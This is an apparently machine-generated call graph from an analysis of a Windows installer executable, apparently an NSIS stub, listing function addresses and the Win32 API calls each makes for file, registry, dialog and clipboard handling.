4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 